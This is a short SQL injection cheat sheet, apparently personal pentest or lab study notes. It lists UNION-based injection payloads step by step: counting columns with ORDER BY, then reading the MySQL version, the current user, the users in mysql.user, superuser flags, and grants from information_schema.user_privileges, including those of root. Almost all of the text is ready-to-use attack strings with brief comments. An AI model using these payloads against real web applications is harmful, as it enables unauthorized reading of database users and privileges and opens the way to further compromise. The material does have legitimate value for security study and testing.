SQL Injection

' order by 1-- -

' order by 2-- -

cn' UNION select 1,2,3-- -

cn' UNION select 1,2,3,4-- -

cn' UNION select 1,@@version,3,4-- -

cn' UNION select 1,user(),3,4-- -

cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -

SELECT super_priv FROM mysql.user

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -

# Will display the privilege of user root / just change it
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
= (Y means yes indicating superuser privileges)

# Will display all privilege of users
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -

# Will display the user and privilege for the databases / just change it
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

Last updated